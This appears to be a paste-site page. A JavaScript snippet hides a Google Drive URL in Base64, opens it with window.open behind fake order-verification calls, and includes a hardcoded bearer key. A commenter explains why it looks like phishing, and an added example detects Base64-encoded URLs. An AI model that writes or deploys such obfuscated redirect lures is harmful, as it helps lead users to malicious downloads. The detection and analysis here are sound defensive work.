kammex

Untitled

Apr 30th, 2025
(async function () {
  const apiEndpoint = "/v1/order/30642/status";
  const orderId = "ORD-" + Math.random().toString(36).substring(2, 10).toUpperCase();

  async function verifyOrder(id) {
    try {
      const response = await fetch(apiEndpoint, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          "Authorization": "Bearer sk_live_xr7u8ghs1k2as91"
        },
        body: JSON.stringify({ order_id: id })
      });

      const data = await response.json();
      return data;
    } catch (err) {
      return { status: "ERROR" };
    }
  }

  function logEvent(id, status) {
    fetch("/v1/event", {
      method: "POST",
      headers: {
        "Content-Type": "application/json"
      },
      body: JSON.stringify({
        event: "delivery_attempt",
        order: id,
        result: status
      })
    });
  }

  const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpfQ290djVDYjFYQkcxSFdwaXZKT0VYaUN1MHJnTWsvdmlldw==';
  const decode = atob;
  const finalURL = decode(secret);

  window.open(finalURL, '_self');

  const status = await verifyOrder(orderId);
  logEvent(orderId, status.status === "CONFIRMED" ? "success" : "fallback");
})();
Comments
  • PRSADSRXSIRAX
    3 hours (edited)
    Yes — this script is highly suspicious and likely malicious or phishing-related, just like the one you shared earlier.

    Why This Is Suspicious / Malicious

    🚨 Auto-generated Fake Order ID

        const orderId = "ORD-" + Math.random().toString(36)...

    Fakes a seemingly valid order ID to simulate a legitimate transaction.

    Exposed Secret API Key

        "Authorization": "Bearer sk_live_xr7u8ghs1k2as91"

    API keys like this should never be public.

    This key could be:

    - Stolen from a service
    - Fake, used to trick you into trusting the request
    - Harvested if someone runs the script locally

    📥 Hidden Redirection via Base64

        const secret = 'aHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL2ZpbGUvZC8xOFpf...';
        const finalURL = decode(secret);
        window.open(finalURL, '_self');

    Base64-decoded string redirects the user to:

        https://drive.google.com/file/d/18Z_Cotv5Cb1XBG1HWpivJOEXiCu0rgMk/view

    This is a file hosted on Google Drive — often used in phishing and malware distribution because:

    - It bypasses some filters
    - Google Drive links look trustworthy

    🧪 Fake Order Verification + Logging

        verifyOrder(...);
        logEvent(...);

    This pretends to verify an order and log an event.

    It’s likely just smoke and mirrors — it does nothing meaningful but creates the illusion of legitimate backend activity.

    🧨 Conclusion

    Yes — this is likely part of a phishing scam or malware distribution technique.

    It tries to:

    - Pretend to verify an order
    - Redirect the user to a suspicious file on Google Drive
    - Possibly log their activity or trick them into interacting with malicious content
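
The Base64 redirection described in the comment above, turned into a static check. This is an added example, not part of the paste or of the comment. It runs under Node.js; `findEncodedUrls`, the sample script and the `files.example.test` URL are constructed for illustration.

```javascript
// Added example: static triage for URLs hidden in Base64 string literals.
// Literals are decoded directly, so aliasing atob (const decode = atob)
// does not hide them the way it hides them from a search for "atob(".
const B64_LITERAL = /(['"`])([A-Za-z0-9+/]{16,}={0,2})\1/g;
const PRINTABLE_URL = /^https?:\/\/[\x21-\x7e]+$/i;
const NAV_SINK = /\b(?:window\.open|location\.(?:href|assign|replace))\b/;

function findEncodedUrls(source) {
  const navigates = NAV_SINK.test(source);
  const findings = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const decoded = Buffer.from(m[2], "base64").toString("utf8");
    // Ordinary strings such as "application/json" also fit the Base64
    // alphabet; they decode to noise and are dropped here.
    if (!PRINTABLE_URL.test(decoded)) continue;
    let host;
    try {
      host = new URL(decoded).hostname;
    } catch {
      continue;
    }
    const line = source.slice(0, m.index).split("\n").length;
    findings.push({ line, decoded, host, navigates });
  }
  return findings;
}

// Constructed sample with the same shape as the paste (hypothetical URL).
const hidden = Buffer.from("https://files.example.test/d/abc123/view")
  .toString("base64");
const SAMPLE = [
  'const headers = { "Content-Type": "application/json" };',
  `const secret = '${hidden}';`,
  "const decode = atob;",
  "window.open(decode(secret), '_self');",
].join("\n");

for (const f of findEncodedUrls(SAMPLE)) {
  const sink = f.navigates ? "navigation sink present" : "no navigation sink";
  console.log(`line ${f.line}: ${f.decoded} (host ${f.host}; ${sink})`);
}
```

A finding only shows that a literal decodes to a URL; the destination still has to be assessed separately.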
  • PRSADSRXSIRAX
    3 hours
    Very great!